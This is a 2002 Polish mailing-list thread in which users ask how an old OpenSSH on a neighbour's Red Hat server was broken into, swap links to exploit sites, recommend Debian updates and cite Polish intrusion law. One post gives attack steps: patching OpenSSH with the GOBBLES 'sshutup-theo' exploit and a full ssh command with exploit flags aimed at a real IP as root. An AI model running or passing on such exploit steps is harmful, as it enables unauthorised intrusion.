Re[2]: OpenSSH < 3.3

2002-11-18 Wątek Maciej Piekielniak
Witaj pawelek,

W Twoim liście datowanym 17 listopada 2002 (08:19:46) można przeczytać:

pip> Co do openssh to nie. Ale w celach sprawdzenia zabezpieczen wlasnego sytemu
pip> i nie tylko wlasnego ;) masz duzo exploitow localnych-atak z wewnatrz
pip> serwera i global-atak z innego serwera, na stronce
pip> http://www.ryanspc.com.

pip> Polecam przejscie na Debiana i czeste upgrade. Raz na 2 tygodnie.


Btw to nie moj serwer a odpowiedz na tekst "Moze by przejsc na
debiania" skonczyl sie tekstem sasiada "E tam, bede sie znowu pol roku
nowego systemu uczyl" ;]

Btw znalazlem w necie taki spokob:

Sciagamy OpenSSH 3.4p1 pozniej patchujemy go patchem z
http://immunitysec.com/GOBBLES/exploits/sshutup-theo.tar.gz


a pozniej wchodzimy na openssh 2.3.1-3-3 np tak:
./ssh -l root 4.61.244.147 -M bsdauth -S skey -j 4096 -d 3050

Niestety doczytalem sie ze dziala tylko na OpenBSD :( Linuksa to nie
rusza, proste, linux nawet nie ma ustawionego sposobu autentyfikacji
typu bsd. Wiem jednak ze jakis sposob jest, jakos sie ktos na tego RH
wlamal (i to przez ssh).



-- 
Pozdrowienia,
 Maciejmailto:[EMAIL PROTECTED]



Re: OpenSSH < 3.3

2002-11-17 Wątek |K a C z Y|
On Sun, 17 Nov 2002, [EMAIL PROTECTED] wrote:
> Polecam przejscie na Debiana i czeste upgrade. Raz na 2 tygodnie.

chyba raczej stosowanie do DSA niż raz na 2 tygodnie mam na myśli gałąź
stable oczywiście

-- 

Unix, MS-DOS, and Windows NT AKA the Good, the Bad, and the Ugly
--[ debian.e-legionowo.pl ][ FBSD.glt.pl ]--



Re: OpenSSH < 3.3

2002-11-17 Wątek Mikołaj Menke

Użytkownik [EMAIL PROTECTED] napisał:


Teraz cos w sprawie wlaman.
Rozdzial XXXIII Kodeksu Karnego art. 267, 268 i 269.
 

Skoro już w temacie. Zapoznałem się z powyższymi i mam takie pytanie: 
włamanie, ping of death i wszelkie ataki typu DoS to się pod to 
zdecydowanie podciągają, ale jak jest ze skanowaniem portów? Uzyskane 
informacje to powiedzmy otwarte porty. Czy to jest jakaś zastrzeżona 
informacja?



Jezeli masz dowaody takie wlamania, masspinga wysylasz e-mail do TPSA na
adres [EMAIL PROTECTED]
 


Czemu akurat TPSA? Nie może być [EMAIL PROTECTED]

--
http://www.miki.z.pl
[EMAIL PROTECTED]
Gadu-gadu: 2128279
Mobile: +48607345846




Re: OpenSSH < 3.3

2002-11-17 Wątek pawelek_
Teraz cos w sprawie wlaman.
Rozdzial XXXIII Kodeksu Karnego art. 267, 268 i 269.
Jezeli masz dowaody takie wlamania, masspinga wysylasz e-mail do TPSA na
adres [EMAIL PROTECTED]
Ostatnio mi sie przydarzyl massping na moj serwer - sdi nie bylo trudno
zapingowac. Gosc z sieci odemnie powrzucal sobie z jakim gosciam na ircnecie
i stad ten massping.
-
http://www.sdi-slichowice.one.pl
GG: 39211



Re: OpenSSH < 3.3

2002-11-17 Wątek pawelek_
Co do openssh to nie. Ale w celach sprawdzenia zabezpieczen wlasnego sytemu
i nie tylko wlasnego ;) masz duzo exploitow localnych-atak z wewnatrz
serwera i global-atak z innego serwera, na stronce
http://www.ryanspc.com.

Polecam przejscie na Debiana i czeste upgrade. Raz na 2 tygodnie.

pozdrawiam
Pawelek L.
-
http://www.sdi-slichowice.one.pl
GG: 39211





OpenSSH < 3.3

2002-11-16 Wątek Maciej Piekielniak
Witaj !

Jeszcze nie tak dawno (jakies 3 miesiace temu) do sasiada na serwer
wlamał się łepek (z którym pozniej sie zlapalem na ircu) o ksywie
l3vis. Lepek ten byl w grupie hakerskiej, a zlapalem go kanale #romania (inny 
serwer). Po dluzszej rozmowie z osoba ktora
sie
wlamala do sasiada, dowiedzialem sie ze wina lezala w starym ssh.
Tak w ogole byl RH7.0 + openssh badajze 2.3.

Na dzisiejszy dzien w sumie juz o tym zapomnialem ale moze pamieta
ktos link do jakiejs stronki z opisem jak to mozna zrobic na starym ssh (priv
tez mile widziany).  

-- 
Pozdrowienia,
 Maciej  mailto:[EMAIL PROTECTED]